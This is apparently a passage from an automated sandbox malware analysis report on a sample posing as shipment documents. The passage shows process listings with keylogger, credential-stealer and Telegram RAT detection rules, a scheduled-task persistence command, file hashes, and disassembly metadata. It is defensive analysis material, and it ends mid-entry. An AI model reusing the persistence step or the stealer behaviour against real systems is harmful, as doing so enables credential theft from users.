                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:03:35:14
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Imagebase:0x350000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 29%, ReversingLabs
                                                    • Detection: 38%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:03:35:16
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff693ab0000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                                                    Imagebase:0x380000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0x410000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0x190000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0xd20000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:59
                                                      Total number of Limit Nodes:10
                                                      execution_graph 27070 58d1968 27072 58d1989 27070->27072 27071 58d199e 27072->27071 27075 58d0f08 27072->27075 27074 58d1a09 27077 58d0f13 27075->27077 27076 58d39e9 27076->27074 27077->27076 27081 58d4560 27077->27081 27084 58d4553 27077->27084 27078 58d3afc 27078->27074 27091 58d2f9c 27081->27091 27085 58d455b 27084->27085 27086 58d45d6 DrawTextExW 27084->27086 27088 58d2f9c DrawTextExW 27085->27088 27089 58d463e 27086->27089 27090 58d457d 27088->27090 27089->27078 27090->27078 27092 58d4598 DrawTextExW 27091->27092 27094 58d457d 27092->27094 27094->27078 27045 17746a0 27047 17746b7 27045->27047 27046 17746ee 27047->27046 27049 17747b9 27047->27049 27050 17747c1 27049->27050 27051 17747e5 27050->27051 27053 17748b0 27050->27053 27051->27047 27054 17748b5 27053->27054 27058 17749c0 27054->27058 27062 17749b0 27054->27062 27060 17749e7 27058->27060 27059 1774ac4 27059->27059 27060->27059 27066 1774610 27060->27066 27063 17749b9 27062->27063 27064 1774ac4 27063->27064 27065 1774610 CreateActCtxA 27063->27065 27065->27064 27067 1775e50 CreateActCtxA 27066->27067 27069 1775f13 27067->27069 27069->27069 27095 177d700 DuplicateHandle 27096 177d796 27095->27096 27021 177b138 27025 177b21f 27021->27025 27030 177b230 27021->27030 27022 177b147 27026 177b264 27025->27026 27027 177b241 27025->27027 27026->27022 27027->27026 27028 177b468 GetModuleHandleW 27027->27028 27029 177b495 27028->27029 27029->27022 27031 177b241 27030->27031 27032 177b264 27030->27032 27031->27032 27033 177b468 GetModuleHandleW 27031->27033 27032->27022 27034 177b495 27033->27034 27034->27022 27035 177d4b8 27036 177d4fe GetCurrentProcess 27035->27036 27038 177d550 GetCurrentThread 27036->27038 27039 177d549 27036->27039 27040 177d586 27038->27040 27041 177d58d GetCurrentProcess 27038->27041 27039->27038 27040->27041 27044 177d5c3 27041->27044 27042 177d5eb GetCurrentThreadId 27043 177d61c 27042->27043 27044->27042

                                                      Executed Functions

                                                      Function 0177D4A9 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 307 177d4a9-177d547 GetCurrentProcess 312 177d550-177d584 GetCurrentThread 307->312 313 177d549-177d54f 307->313 314 177d586-177d58c 312->314 315 177d58d-177d5c1 GetCurrentProcess 312->315 313->312 314->315 317 177d5c3-177d5c9 315->317 318 177d5ca-177d5e5 call 177d687 315->318 317->318 321 177d5eb-177d61a GetCurrentThreadId 318->321 322 177d623-177d685 321->322 323 177d61c-177d622 321->323 323->322
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D536
                                                      • GetCurrentThread.KERNEL32 ref: 0177D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0177D609
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 991debcfd7a80be31a1e22bcee6d653f8496fce9f365985bce372796c34e0e2d
                                                      • Instruction ID: b7c8d715b41d3b9b674588a4561f6de95e9611f90d5b8b55b268c314feef6acf
                                                      • Opcode Fuzzy Hash: 991debcfd7a80be31a1e22bcee6d653f8496fce9f365985bce372796c34e0e2d
                                                      • Instruction Fuzzy Hash: 7B5145B09043498FDB18DFA9D548B9EFFF1EF48314F248069E459A7260D7349984CF66
                                                      Function 0177D4B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 330 177d4b8-177d547 GetCurrentProcess 334 177d550-177d584 GetCurrentThread 330->334 335 177d549-177d54f 330->335 336 177d586-177d58c 334->336 337 177d58d-177d5c1 GetCurrentProcess 334->337 335->334 336->337 339 177d5c3-177d5c9 337->339 340 177d5ca-177d5e5 call 177d687 337->340 339->340 343 177d5eb-177d61a GetCurrentThreadId 340->343 344 177d623-177d685 343->344 345 177d61c-177d622 343->345 345->344
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D536
                                                      • GetCurrentThread.KERNEL32 ref: 0177D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0177D609
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: b7786682cb64cb9144fdc05fbde6f1451e7a7f3ee434ddef3bc57ee9cc75ba4a
                                                      • Instruction ID: 34f3eabe0acbcdab9c7144d741a2403418c1497549ffa93bc55c05f0ba473951
                                                      • Opcode Fuzzy Hash: b7786682cb64cb9144fdc05fbde6f1451e7a7f3ee434ddef3bc57ee9cc75ba4a
                                                      • Instruction Fuzzy Hash: 245136B09003098FDB14DFA9D548B9EFBF1EF88314F208469E459A7360D7349984CF65
                                                      Function 0177B230 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 439 177b230-177b23f 440 177b241-177b24e call 177ac04 439->440 441 177b26b-177b26f 439->441 446 177b264 440->446 447 177b250 440->447 442 177b283-177b2c4 441->442 443 177b271-177b27b 441->443 450 177b2c6-177b2ce 442->450 451 177b2d1-177b2df 442->451 443->442 446->441 497 177b256 call 177b4b9 447->497 498 177b256 call 177b4c8 447->498 450->451 453 177b303-177b305 451->453 454 177b2e1-177b2e6 451->454 452 177b25c-177b25e 452->446 455 177b3a0-177b3b9 452->455 456 177b308-177b30f 453->456 457 177b2f1 454->457 458 177b2e8-177b2ef call 177ac10 454->458 472 177b3bb-177b418 455->472 461 177b311-177b319 456->461 462 177b31c-177b323 456->462 460 177b2f3-177b301 457->460 458->460 460->456 461->462 464 177b325-177b32d 462->464 465 177b330-177b339 call 177ac20 462->465 464->465 470 177b346-177b34b 465->470 471 177b33b-177b343 465->471 473 177b34d-177b354 470->473 474 177b369-177b376 470->474 471->470 490 177b41a-177b460 472->490 473->474 476 177b356-177b366 call 177ac30 call 177ac40 473->476 481 177b399-177b39f 474->481 482 177b378-177b396 474->482 476->474 482->481 492 177b462-177b465 490->492 493 177b468-177b493 GetModuleHandleW 490->493 492->493 494 177b495-177b49b 493->494 495 177b49c-177b4b0 493->495 494->495 497->452 498->452
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0177B486
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 369cda6af3dc7332b6b3191866c9d17d5fc55b314f6948abf0acb0c07b6843a2
                                                      • Instruction ID: 3cd2b4351672a03cb2a4012209aa4e591c92e6888a85d4e25ac3251b5088d0e4
                                                      • Opcode Fuzzy Hash: 369cda6af3dc7332b6b3191866c9d17d5fc55b314f6948abf0acb0c07b6843a2
                                                      • Instruction Fuzzy Hash: 99812470A00B458FEB24DF69D44475AFBF1FF88304F048A29D48ADBA54D774E945CB91
                                                      Function 01774610 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 499 1774610-1775f11 CreateActCtxA 502 1775f13-1775f19 499->502 503 1775f1a-1775f74 499->503 502->503 510 1775f76-1775f79 503->510 511 1775f83-1775f87 503->511 510->511 512 1775f89-1775f95 511->512 513 1775f98 511->513 512->513 515 1775f99 513->515 515->515
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01775F01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 2c08a6bbba47e429a6b86f7887c70686e184fdfa7ffbc15c0f77bd124e32521b
                                                      • Instruction ID: 4847947fe7dbce6eff704407e111219044a48c4804e662c5aeaf2bfaf694d1d0
                                                      • Opcode Fuzzy Hash: 2c08a6bbba47e429a6b86f7887c70686e184fdfa7ffbc15c0f77bd124e32521b
                                                      • Instruction Fuzzy Hash: 8341E0B0C0071DCEDB24CFA9C944B9DFBB5BF48304F2480AAE408AB255DB756985CF91
                                                      Function 01775E44 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 516 1775e44-1775e47 517 1775e54-1775f11 CreateActCtxA 516->517 519 1775f13-1775f19 517->519 520 1775f1a-1775f74 517->520 519->520 527 1775f76-1775f79 520->527 528 1775f83-1775f87 520->528 527->528 529 1775f89-1775f95 528->529 530 1775f98 528->530 529->530 532 1775f99 530->532 532->532
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01775F01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: d555fc707ec5180125920b4849def1bb57b621a248fd5d78b9405e7260eb6eac
                                                      • Instruction ID: 73bdb63cbce75b46d3c3e02fa01c5244e67819f07dfc22a116739303f778b2e6
                                                      • Opcode Fuzzy Hash: d555fc707ec5180125920b4849def1bb57b621a248fd5d78b9405e7260eb6eac
                                                      • Instruction Fuzzy Hash: 7A41DDB0C0071DCEDB24DFA9C94478DFBB5BF49304F2484AAE408AB265DBB56985CF91
                                                      Function 058D4590 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 533 58d4590-58d4592 534 58d4599-58d45e4 533->534 535 58d4594-58d4595 533->535 536 58d45ef-58d45fe 534->536 537 58d45e6-58d45ec 534->537 535->534 538 58d4600 536->538 539 58d4603-58d463c DrawTextExW 536->539 537->536 538->539 540 58d463e-58d4644 539->540 541 58d4645-58d4662 539->541 540->541
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,058D457D,?,?), ref: 058D462F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 7ced4229a7df59f0fa35decb13ab51b431d833beccd2519b5bfa810eadbbf194
                                                      • Instruction ID: cff265fe613954620b7314055927acfe4577d67ed2d0fae302e7b92781b25667
                                                      • Opcode Fuzzy Hash: 7ced4229a7df59f0fa35decb13ab51b431d833beccd2519b5bfa810eadbbf194
                                                      • Instruction Fuzzy Hash: F431F1B59012499FDB10CF9AD884ADEFBF5FF58320F14842AE819A7320D775A944CFA0
                                                      Function 058D2F9C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 544 58d2f9c-58d45e4 547 58d45ef-58d45fe 544->547 548 58d45e6-58d45ec 544->548 549 58d4600 547->549 550 58d4603-58d463c DrawTextExW 547->550 548->547 549->550 551 58d463e-58d4644 550->551 552 58d4645-58d4662 550->552 551->552
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,058D457D,?,?), ref: 058D462F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 03ed62dfe71eb348ab148eb202b796292d6f3b10364eb3aa498ff780106661e0
                                                      • Instruction ID: 6f6617c88bee9478484b6c68a8ba76e69bf2c554d258d1f9e71e482a140fa759
                                                      • Opcode Fuzzy Hash: 03ed62dfe71eb348ab148eb202b796292d6f3b10364eb3aa498ff780106661e0
                                                      • Instruction Fuzzy Hash: E531E2B59042099FDB10CF9AD884A9EFBF5FB48310F14842AE919A7220D775A944CFA4
                                                      Function 058D4553 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 555 58d4553-58d4559 556 58d455b-58d4578 call 58d2f9c 555->556 557 58d45d6-58d45e4 555->557 566 58d457d-58d457f 556->566 558 58d45ef-58d45fe 557->558 559 58d45e6-58d45ec 557->559 561 58d4600 558->561 562 58d4603-58d463c DrawTextExW 558->562 559->558 561->562 564 58d463e-58d4644 562->564 565 58d4645-58d4662 562->565 564->565
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,058D457D,?,?), ref: 058D462F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 83333fe992255c84a1b341537eb54680763a93fa7cfac28f277194cde1dfaf86
                                                      • Instruction ID: 6d67d5b04bbeb56150fefd2216355960fb99ab24193450863829a2402fea6184
                                                      • Opcode Fuzzy Hash: 83333fe992255c84a1b341537eb54680763a93fa7cfac28f277194cde1dfaf86
                                                      • Instruction Fuzzy Hash: 372159B6900209AFDF11CF99D844ADEBBF5FF48320F18801AE919E7220C771D951CBA0
                                                      Function 0177D6F8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 570 177d6f8-177d6fe 571 177d700-177d794 DuplicateHandle 570->571 572 177d796-177d79c 571->572 573 177d79d-177d7ba 571->573 572->573
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D787
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 2c50687c5f2d757fb570cc57354a70b8b7898a6b211833918568e04e96aac8a0
                                                      • Instruction ID: 1539602acf51b1917a8688df35f30c0347738d1f2b80141d555f78f905b1d76a
                                                      • Opcode Fuzzy Hash: 2c50687c5f2d757fb570cc57354a70b8b7898a6b211833918568e04e96aac8a0
                                                      • Instruction Fuzzy Hash: 2721E5B5900258AFDB10CFAAD984ADEFFF5EF48310F14801AE914A7310D374A954CFA5
                                                      Function 0177D700 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 576 177d700-177d794 DuplicateHandle 577 177d796-177d79c 576->577 578 177d79d-177d7ba 576->578 577->578
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D787
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: eef7a6b018aca461ebabfbf33742f6928f1dcdb657ea819c90f3a57dd25513d2
                                                      • Instruction ID: 5d0044c82024c6938109e0d53be6e9f652713cb1b4178dacc91fb8d3672c97be
                                                      • Opcode Fuzzy Hash: eef7a6b018aca461ebabfbf33742f6928f1dcdb657ea819c90f3a57dd25513d2
                                                      • Instruction Fuzzy Hash: 7D21C4B59002589FDB10CFAAD984ADEFFF5EB48310F14841AE958B7350D374A944CFA5
                                                      Function 0177B420 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0177B486
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 989fea11290ec9f1485d61ddaec973eeea2d995267b40fc49df8cecf0f4d3f40
                                                      • Instruction ID: f69dac225875700baab5283291ea20ff72d7f91646ae40aaac05b4543131bbbf
                                                      • Opcode Fuzzy Hash: 989fea11290ec9f1485d61ddaec973eeea2d995267b40fc49df8cecf0f4d3f40
                                                      • Instruction Fuzzy Hash: 1911E0B5C003498FDB14DF9AC444ADEFBF4EB89324F10842AD559B7210C375A545CFA5
                                                      Function 0171D3D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28df0b5839419f8587d7e5ff6936605a1a3c0cb2cc3b6c0b2755c47f39dd4fea
                                                      • Instruction ID: 88a822d771ad8935d7f089ae309f5e288252fdb2152c4484e094fdd691e20af3
                                                      • Opcode Fuzzy Hash: 28df0b5839419f8587d7e5ff6936605a1a3c0cb2cc3b6c0b2755c47f39dd4fea
                                                      • Instruction Fuzzy Hash: 9B2136B1140200DFDB25DF88D9C8B56FF65FB88314F20C1A9ED090B25AC336E446CAA1
                                                      Function 0171D4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cb72d358fb08c18be749e5f14ac023274d44c430549878516a71c2bd05d6861
                                                      • Instruction ID: f979e712f93929eb27c1f443d0543b6bd8f644f06917d0e0175071f695950fba
                                                      • Opcode Fuzzy Hash: 4cb72d358fb08c18be749e5f14ac023274d44c430549878516a71c2bd05d6861
                                                      • Instruction Fuzzy Hash: 49210371500240DFDB25DF5CD9C8B26FF65FB88318F30C5A9E9090B25AC336D456CAA1
                                                      Function 0172D1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f95674fcd30531e3ef84765d39f2a6a86f2f538d68dd09ff1d90f1402b0f0569
                                                      • Instruction ID: fc4dddc7ee945f24f0ec8b3b3b271c5516510d27bfc06954a2b3232533aec66b
                                                      • Opcode Fuzzy Hash: f95674fcd30531e3ef84765d39f2a6a86f2f538d68dd09ff1d90f1402b0f0569
                                                      • Instruction Fuzzy Hash: 16212671508200EFDB25DF98D9C4B26FBE5FB89324F20C6ADE9098B256C336D447CA61
                                                      Function 0172D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dff93752d53a54ea68ca9863d34d694b00a5dfe1225df37578347f11b3a82f19
                                                      • Instruction ID: 345a5f97249c062dad9a470ed791c7654215084d1810e21af9334c486e17a2be
                                                      • Opcode Fuzzy Hash: dff93752d53a54ea68ca9863d34d694b00a5dfe1225df37578347f11b3a82f19
                                                      • Instruction Fuzzy Hash: 8C212271604240DFCB35DF98D9C4B26FFA5EB88314F20C5ADD90A4B2A6C33AD447CA61
                                                      Function 0171D4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
